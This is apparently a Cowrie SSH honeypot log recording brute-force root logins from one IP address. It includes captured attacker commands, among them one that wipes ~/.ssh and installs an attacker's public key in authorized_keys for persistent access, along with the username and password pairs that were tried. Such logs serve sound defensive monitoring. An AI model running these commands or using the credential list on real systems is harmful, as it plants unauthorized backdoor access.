{"eventid":"cowrie.login.failed","username":"service","password":"123456","message":"login attempt [service/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T21:52:43.375276Z","src_ip":"212.227.235.229","session":"e374ea5e29ef"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:43.628495Z","src_ip":"212.227.235.229","session":"75543c316899"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:52:43.668772Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:43.669736Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37020,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfee4d9f2de7","protocol":"ssh","message":"New connection: 212.227.235.229:37020 (1.2.3.4:22) [session: cfee4d9f2de7]","sensor":"my-vps","timestamp":"2025-09-08T21:52:43.962100Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:43.962808Z","src_ip":"212.227.235.229","session":"cfee4d9f2de7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:52:44.165723Z","src_ip":"212.227.235.229","session":"10bdf532d0d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:44.255764Z","src_ip":"212.227.235.229","session":"cfee4d9f2de7"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:44.472608Z","src_ip":"212.227.235.229","session":"d286d16b6dc0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:44.473661Z","src_ip":"212.227.235.229","session":"10bdf532d0d0"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:44.701611Z","src_ip":"212.227.235.229","session":"e374ea5e29ef"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:52:45.469039Z","src_ip":"212.227.235.229","session":"cfee4d9f2de7"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:46.764488Z","src_ip":"212.227.235.229","session":"cfee4d9f2de7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47776,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffe5b5e9b558","protocol":"ssh","message":"New connection: 212.227.235.229:47776 (1.2.3.4:22) [session: ffe5b5e9b558]","sensor":"my-vps","timestamp":"2025-09-08T21:52:47.054459Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:52:47.055504Z","src_ip":"212.227.235.229","session":"ffe5b5e9b558"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:52:47.347715Z","src_ip":"212.227.235.229","session":"ffe5b5e9b558"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:52:48.557027Z","src_ip":"212.227.235.229","session":"ffe5b5e9b558"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:48.849843Z","src_ip":"212.227.235.229","session":"29fbb5bcb978"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:52:48.850985Z","src_ip":"212.227.235.229","session":"ffe5b5e9b558"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53240,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca93d58a5b28","protocol":"ssh","message":"New connection: 212.227.235.229:53240 (1.2.3.4:22) [session: ca93d58a5b28]","sensor":"my-vps","timestamp":"2025-09-08T21:53:22.444982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:53:22.501771Z","src_ip":"212.227.235.229","session":"ca93d58a5b28"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:53:22.793181Z","src_ip":"212.227.235.229","session":"ca93d58a5b28"}
{"eventid":"cowrie.login.failed","username":"webuser","password":"webuser.123","message":"login attempt [webuser/webuser.123] failed","sensor":"my-vps","timestamp":"2025-09-08T21:53:23.651500Z","src_ip":"212.227.235.229","session":"ca93d58a5b28"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:24.861966Z","src_ip":"212.227.235.229","session":"ca93d58a5b28"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:29.106906Z","src_ip":"212.227.235.229","session":"bc3a07b0a72f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44754,"dst_ip":"1.2.3.4","dst_port":22,"session":"055ea54f026f","protocol":"ssh","message":"New connection: 212.227.235.229:44754 (1.2.3.4:22) [session: 055ea54f026f]","sensor":"my-vps","timestamp":"2025-09-08T21:53:31.692015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:53:31.692840Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:53:31.862308Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456","message":"login attempt [root/A123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:53:32.572613Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:53:32.976717Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:53:32.977379Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:53:32.978157Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:33.147059Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:53:33.500400Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:53:33.501761Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:53:33.671804Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:33.672654Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44762,"dst_ip":"1.2.3.4","dst_port":22,"session":"512ac0369a86","protocol":"ssh","message":"New connection: 212.227.235.229:44762 (1.2.3.4:22) [session: 512ac0369a86]","sensor":"my-vps","timestamp":"2025-09-08T21:53:33.845269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:53:33.846463Z","src_ip":"212.227.235.229","session":"512ac0369a86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:53:34.018842Z","src_ip":"212.227.235.229","session":"512ac0369a86"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:53:34.749032Z","src_ip":"212.227.235.229","session":"512ac0369a86"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:35.923241Z","src_ip":"212.227.235.229","session":"512ac0369a86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49468,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dbcf5e3673f","protocol":"ssh","message":"New connection: 212.227.235.229:49468 (1.2.3.4:22) [session: 8dbcf5e3673f]","sensor":"my-vps","timestamp":"2025-09-08T21:53:36.093083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:53:36.093944Z","src_ip":"212.227.235.229","session":"8dbcf5e3673f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:53:36.261737Z","src_ip":"212.227.235.229","session":"8dbcf5e3673f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:53:36.974433Z","src_ip":"212.227.235.229","session":"8dbcf5e3673f"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:37.143170Z","src_ip":"212.227.235.229","session":"055ea54f026f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:37.144510Z","src_ip":"212.227.235.229","session":"8dbcf5e3673f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46446,"dst_ip":"1.2.3.4","dst_port":22,"session":"545490a25274","protocol":"ssh","message":"New connection: 212.227.235.229:46446 (1.2.3.4:22) [session: 545490a25274]","sensor":"my-vps","timestamp":"2025-09-08T21:53:40.996710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:53:40.997635Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:53:42.761552Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.login.success","username":"root","password":"Xdaknc8z","message":"login attempt [root/Xdaknc8z] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:53:43.504595Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:53:44.045407Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:53:44.046163Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:53:44.047074Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:45.056325Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:53:45.364820Z","src_ip":"212.227.235.229","session":"545490a25274"}
